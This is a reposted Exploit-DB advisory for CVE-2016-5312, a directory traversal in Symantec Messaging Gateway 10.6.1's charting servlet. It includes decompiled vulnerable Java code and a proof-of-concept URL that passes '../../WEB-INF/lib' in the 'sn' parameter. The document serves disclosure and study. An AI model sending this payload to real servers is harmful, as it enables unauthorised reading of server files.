Symantec Messaging Gateway 10.6.1 – Directory Traversal - 体验盒子

作者： R-73eN

日期： 2016-09-28

类别：

webapps

平台：

java

来源：https://www.exploit-db.com/exploits/40437/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal

# Date : 28/09/2016

# Author : R-73eN

# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)

# Software : https://www.symantec.com/products/threat-protection/messaging-gateway

# Vendor : Symantec

# CVE : CVE-2016-5312

# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00

#

#_________ __

# |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |

#| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |

#| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___

# |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|

#

# DESCRIPTION:

#

# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.

# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.

# This could potentially provide read access to some files/directories on the server for which the user is not authorized.

#

The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java

The vulnerable code is

extends HttpServlet {

public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {

block6 : {

try {

String string = httpServletRequest.getParameter("sn");

//**** Taking parameter "sn" and writing it to the "string variable"

if (string == null) break block6;

String string2 = string.substring(string.length() - 3);

byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

//**** The string variable is passed here without any sanitanization for directory traversal

//**** and you can successfully use this to do a directory traversal.

if (arrby != null) {

httpServletResponse.setContentType("image/" + string2);

ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();

httpServletResponse.setContentLength(arrby.length);

servletOutputStream.write(arrby);

this.getServletContext().removeAttribute(string);

break block6;

}

POC:

https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib